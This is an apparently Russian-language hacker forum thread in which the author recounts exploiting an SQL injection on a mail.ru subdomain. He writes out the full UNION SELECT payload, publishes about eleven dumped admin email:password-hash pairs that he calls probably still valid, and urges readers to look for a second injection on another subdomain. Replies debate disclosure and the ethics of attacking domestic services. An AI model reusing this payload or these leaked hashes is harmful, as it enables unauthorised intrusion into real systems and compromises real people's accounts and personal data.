Всем доброго времени суток. Даже не знаю с чего начать, дык тема старая (в привате нигде ее не было, только в моей голове.). Статью (если ее так можно назвать) написать уговорил Kusto. Началось все как обычно у меня всегда все начинается, с поиска xss на mail.ru. Тыкал с кнопки туда сюда, чувствовал себя исследователем и искал. И на один мой тык по адресу PHP: http://auto.mail.ru/view.html?video_id='1 мне вывалилась ошибка в sql. При помощи Уважаемого мною юзера Античата Nemaniak начали мы ее ковырять. Итого после долгого брута, sql ошибка вылилась в такой вот запрос PHP: http://auto.mail.ru/view.html?video_id=-1+UnIon+seLeCt+1,2,3,concat_ws(0x3a,a_email,a_password)+from+system_admins+limit+0,1+--+ А мы увидели хеш пароля от почты PHP: aizikovich@mail.ru:2e3b8f6d73eb89715150919027e5bf71: Я сперва подумал, что я добрался до базы админских почтовых ящиков и начал выводить все почтовые ящики перебирая лимит вывода +limit+0,1 (спасибо за подсказку Maniak), но скоро радость закончилась, так как вывести я смог только хеши паролей от 11 админских ящиков. Осозновая свою ничтожность, а так же осозновая что мне нафиг не нужны ни пароли, ни хеши от админских ящиков, я пришел на Античат и спросил местных знатоков, сколько же все таки может стоит данная уязвимость, если ее попытаться продать (учитывая что ни сама уязвимость, ни результат ее реализации мне нафиг не нужны, так как раскручивали только из чистого любопытства, было интересно в денежном эквиваленте - на сколько мы тогда наковыряли) Создал тему про стоимость sql на популярных почтовых серверах https://forum.antichat.ru/thread144589.html и получил ответ от Великого Блэксана (он действительно Великий, просто характер у него такой ) и естественно будучи серой массой (не белой вороной как сейчас), а значит гамном, я далее тему развивать не стал и забыл про эту sql и ее последствия . На данный момент sql на мейле прикрыта (уже давно), про хеши я думать забыл (пока мне сегодня не напомнили). Выкладываю и сам sql запрос и выуженные через нее хеши админских паролей. PHP: http://auto.mail.ru/view.html?video_id=-1+UnIon+seLeCt+1,2,3,concat_ws(0x3a,a_email,a_password)+from+system_admins+limit+0,1+--+ HTML: [email protected]:2e3b8f6d73eb89715150919027e5bf71: [email protected]:116791431a767fdf9321875186683b34: [email protected]:77ef5dc9edd2d4d764399237b3b59892: [email protected]:3e5555700638643f230b98a544f287ad: [email protected]:dffc7be887f428c3f18a60c8a7d85a14: [email protected]:b11871cb1f75cb38a8a401add015734b: [email protected]:72b4961d6ed4101abfd09321747d45ba: [email protected]:ab41f00cd7aa00e9b679a2d275 [email protected]:a570bf4990157efc9118f7e38d2cdbbe: [email protected]:2e36b9903435d5da3815d2d298380f6b: [email protected]:38974963b8b8ea9b2d70c6115b091f64: Хеши наверное все еще живые, не брутил их. Помню тогда вбил их в гугл, и увидел что то их уже кто то брутил (по ходу я был далеко не первым ) и забил на них. Потом была еще одна sql инъекция на mail.ru (на поддомене http://sysadmin.mail.ru/). Щас даже не помню где именно была дырка, но помню что были удачно выведены пароли от одной партнерки мейла (около 10 000 паролей) и так же удачно забыты вместе с самим sql запросом. Нигде, даже в логах не сохранились ни пароли, ни сам запрос, поэтому дерзайте, может не закрыли еще . С уважением, Satana-fu
Кстати- упросил его я написать статью, чтобы показать что и у крупных поэктов бывают ошибки- почему была раньше не выложенна статья- думаю понимате , думаю что в ближайшем будующем- будут еще темы, и очень хорошо что этот человек не занимается взломами на заказ- иначеб конкурентов у него небыло бы (я просто знаю его возможности))) P.S. Подтверждаю что данная уязвимость была на самом деле а не в воображении ТС ( поэтому и выкладываеться сейчас-(спустя пол года после ее прикрытия)- чтоб не нанести вред любимому почтовому сервису)
>>почему была раньше не выложенна статья- думаю понимате эм... вероятно вы просто не сидите нигде кромя как здесь. для меня например это жоский баян! в квекве была тема типа: нахера вам авторег если с мэйла можно дернуть мыл/аков столько сколько вам нужно.
вообще то на приватах есть такой баг, я видал одну но это или другой не помню. Там тоже были проблемы хешами и поддомене мейла. Тока смысл?! Не думаю что по своим будем стрелят, все таки не красиво
Уважаемый, 1. дата этой уязвимости 20.09.2009, да и вообще этой статьи , почти год прошел с тех пор. 2. Вряд ли вы дернете с мейл.ру sql уязвимостью столько мыл/акков, сколько вам угодно. Не пугайте народ. 3. какая связь между авторегером и админскими хешами ? 4. Гульчатай, откройте личико. 5. Выделил, то на что Вам стоило обращать внимание.
вообще то не потеряла свою актуальность и не будеть потерят. Бро я не обвиняю тебя я говорил в обшем смысле. А те которые проспамят по агенту и ломают ру ящики я даже их никем не считаю. Просто если поднимать такие темы(мини статейки) про наших ресурсов может привлеч минимум ддос к этим серверам. PS. я против работе по снг, вот буржуев хот .... мне без разницы. PPS. лучше бы статейку к админам отправил(но они даже спс не скажут демоны)
Я им уже отправлял однажды. Спасибо не сказали, даже не ответили , поэтому я делал ради интереса и забывал. Бог свидетель, что на паблик выложил впервые, и то по просьбе. Про эту тоже не вспомнил бы, если не напомнили бы.
Будет Вам и про буржуйские))) но немного попозже))) (там горепрограммеров еще больше чем у нас))) вот этим ачат и отличается от квекве, что здесь ВСЕ понимают что те циферки после майла- не пароль а лиш хеш его, и автореггер хешами не замениш (иногда лучше промолчать, чем дать понять что не в теме-НО, вроде бабушки у подьезда говорили что....) Отличаеш глаголы- я уже СЛЫШАЛ и я НАШОЛ????
ветка вроде как 4-я, потому что базы вроде как брутом брали, структура и название бд не сохранилось ни у меня, ни у Maniak.
2. нефакт. 3. никакой. я про хэши ничего не говорил. просто написал свое имхо. вы же не видели реально че выкладывали. да и вобще меня подобные темы как то мало интересуют. а ачат отличается от квекве тем что здесь есть люди которые умудряются толкать "суперприватные баги" за 1000$ о которых знает чуть ли не вся квекве школота. вот это хотел написать давно. и да: знаешь кусто как бы тебе объяснить? я и не хотел ДАТЬ ПОНЯТЬ что я в "теме". если бы хотел то сделал бы это. надеюсь тебе и таким как ты от этого станет легче на душе. не в обиду. никого не оскорблял и никому не затыкал рот заметьте.
Я вообще не понимаю людей, которые ходят по сайтам и пихают кавычки в запросы, а при виде ошибки раскручивают скули по стандартной схеме, чтобы потом выложить их на каком-нибудь форуме. Чем крупнее сайт с найденной узявимостью - тем глубже в приват это все выкладывается и тем выше ЧСВ у нашедшего эту уязвимость. Кто больше кавычек напихал в запросы - становится гуру для других. Так вот, к чему я это все написал... Romik001, если вся школота на квекве знает какие-то "приватные баги" и дро*ит на них, периодически меряясь, чей баг длиннее, то умные люди рубят на этих багах бабло...
БрейнДед, зная Кусто, уверен, что он имел ввиду не эту статью годовой давности, которая потеряла свою актуальность и приватом как бэ особо и не является, а совсем другое, которое по сей день актуально и является приватом даже для привата. Имхо мое личное мнение.
К ответу Satana-fu мне добавить нечего))), эта статья родилась на той волне, что не надо стебаться над новичками- иногда они находят интересные баги)), насчет того что я имел ввиду- со временем вы узнаете )),(это действительно приват даже для приватов ), просто бага рабочая и нам бы не хотелось чтоб вы с помощью нее опустили другой популярный сервис)))
+100500. к сожалению на ачате, до недавнего времени, это происходило сплошь и тядом. ждём с нетерпением. интересует не столь сам факт взлома, как история нахождения самой баги. интересно, как находят необычные и супер приватные уязвимости. каков ход мыслей и действий. играет ли роль везение. почему до сих пор специалисты по безопасности и другие хакеы не нашли эту багу. и т.д.